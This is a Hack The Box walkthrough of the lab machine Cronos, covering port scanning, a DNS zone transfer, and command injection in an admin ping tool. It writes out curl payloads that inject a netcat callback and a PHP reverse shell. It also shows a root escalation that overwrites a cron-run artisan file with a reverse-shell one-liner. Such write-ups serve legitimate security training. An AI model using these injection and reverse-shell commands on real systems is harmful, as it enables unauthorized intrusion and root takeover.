After running our port scans we find three open ports. The box is running SSH, a DNS server, and a webserver.
root@kali:~# nmap -sSVC -p- 10.10.10.13 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA) | 256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA) |_ 256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519) 53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux) | dns-nsid: |_ bind.version: 9.10.3-P4-Ubuntu 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Now that we have a list of open ports and what services each one is running we need to enumerate each one further and determine which one is going to be our initial way in. SSH is probably not going to be our initial way in unless we discover credentials while enumerating another service. A quick search using searchsploit reveals there is a vulnerability in OpenSSH 7.2p2 that would allow for checking whether a particular username exists. We will keep this in mind in case it becomes useful later.
Port 80 (HTTP) is usually interesting and often opens a number of opportunities for further enumeration. Let’s first navigate to the web page in a browser. We are greeted with an Apache default page.
Since we only get a default page when browsing to the page using the machine’s IP address, we may want to consider that there could be virtual host routing in play. If we edit our /etc/hosts file to add the machine’s name cronos.htb and then revisit the page we now get a different page:
Taking a look at the links on this page they are all linking off the site and are out of scope. It appears the site is running Laravel a PHP web framework. Taking a look at the source for the page as well as browsing to http://cronos.htb/robots.txt doesn’t yield anything particularly interesting. We will want to do further vulnerability research on Laravel and try to find the version running and see if there is anything we can exploit. In the meantime, let’s kick off nikto and gobuster.
root@kali:~# gobuster dir -u http://cronos.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large -directories.txt Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@FireFart) [+] Url: http://cronos.htb [+] Threads: 10 [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s 2019/12/25 13:14:41 Starting gobuster /js (Status: 301) /css (Status: 301) /server-status (Status: 403)
root@kali:~/hackthebox/cronos-10.10.10.13# nikto -h cronos.htb - Nikto v2.1.6 Target IP: 10.10.10.13 Target Hostname: cronos.htb Target Port: 80 + Start Time: 2019-12-25 13:15:02 (GMT-5) Server: Apache/2.4.18 (Ubuntu) The anti-clickjacking X-Frame-Options header is not present. The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type Cookie XSRF-TOKEN created without the httponly flag No CGI Directories found (use '-C all' to force check all possible dirs) Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch. Allowed HTTP Methods: GET, HEAD OSVDB-3092: /web.config: ASP config file is accessible. OSVDB-3268: /css/: Directory indexing found. OSVDB-3092: /css/: This might be interesting… OSVDB-3233: /icons/README: Apache default file found. 7785 requests: 0 error(s) and 10 item(s) reported on remote host + End Time: 2019-12-25 13:20:45 (GMT-5) (343 seconds) 1 host(s) tested
Since we’re not seeing anything jump out at us right away, now would be a good time to take a step back and review the other services we haven’t enumerated yet. Let’s explore DNS and see if we can do a zone transfer for the cronos.htb domain.
root@kali:~# host -l cronos.htb 10.10.10.13 Using domain server: Name: 10.10.10.13 Address: 10.10.10.13#53 Aliases: cronos.htb name server ns1.cronos.htb. cronos.htb has address 10.10.10.13 admin.cronos.htb has address 10.10.10.13 ns1.cronos.htb has address 10.10.10.13 www.cronos.htb has address 10.10.10.13
This yields several additional host names we should add to our /etc/hosts file and check out. It turns out that http://ns1.cronos.htb takes us to the default Apache page and http://www.cronos.htb takes us to the same page as just http://cronos.htb so those aren’t anything new. However, when we go to http://admin.cronos.htb we are greeted with a login page!
After trying some common default usernames and passwords we don’t get in. Let’s try running gobuster against admin.cronos.htb. We will use a different dictionary (one from dirbuster) and also let’s specify some specific extensions to try: ext, php, txt, bak.
root@kali:~# gobuster dir -x txt,bak,ext,php -u http://admin.cronos.htb -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt ... /index.php (Status: 200) /welcome.php (Status: 302) /logout.php (Status: 302) /config.php (Status: 200) /session.php (Status: 302) /server-status (Status: 403)
We’ve discovered some new interesting pages! Let’s fire up Burp Suite and manually poke around at these pages. When we navigate to http://admin.cronos.htb/welcome.php it immediately redirects us to http://admin.cronos.htb/index.php and the familiar login page. However, we notice something interesting when we examine the request in Burp.
Even without logging in we are able to see the page is some sort of tool that allows you to run traceroute or ping. This suggests that we may want to look for a command injection vulnerability. We can use curl to send a HTTP POST request passing the command & host parameters and see if we can add a semicolon followed by a command of our own. We will start up a netcat listener on our Kali box and see if we can trigger a connection to our machine as follows:
curl -d "command=traceroute&host=126.96.36.199;nc 10.10.14.4 8888" http://admin.cronos.htb/welcome.php
It worked! We were able to trigger a command injection vulnerability and get it to connect back to our machine. Now we will grab the PHP reverse shell from here: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet and attempt to get a shell on the box. We edit the reverse shell to use the IP address of our Kali box and port 8888. We then use https://www.urlencoder.org/ to urlencode it. After setting up the listener we issue our curl command as follows to get a reverse shell.
curl -d "command=traceroute&host=188.8.131.52;php%20-r%20%27%24sock%3Dfsockopen%28%2184.108.40.206%22%2C8888%29%3Bexec%28%22%2Fbin%2Fsh%20-i%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27" http://admin.cronos.htb/welcome.php
Now we have a reverse shell running under the context of the the www-data account. We can use wget to transfer over the LinEnum.sh script and then run it to attempt to identify avenues for privilege escalation. After running the script and examining the output we find an interesting cron job running under the root account.
[-] Crontab contents: /etc/crontab: system-wide crontab Unlike any other crontab you don't have to run the `crontab' command to install the new version when you edit this file and files in /etc/cron.d. These files also have username fields, that none of the other crontabs do. SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin m h dom mon dow user command 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) * * * * root php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
If we examine the /var/www/laravel/artisan file we see that we own it and can modify it! We can either replace or append php code to this file to trigger a root shell.
www-data@cronos:/$ ls -lh /var/www/laravel/artisan -rwxr-xr-x 1 www-data www-data 1.7K Apr 9 2017 /var/www/laravel/artisan www-data@cronos:/$
We will replace the file with a simple one line PHP script to send us a reverse shell on port 9999 as shown below. Afterwards, we setup a netcat listener and wait for our root shell to arrive.
echo '<?php $sock=fsockopen("10.10.14.4",9999);exec("/bin/sh -i <&3 >&3 2>&3"); ?>' /var/www/laravel/artisan
Within a minute the cron job runs and we do our r00t dance 🙂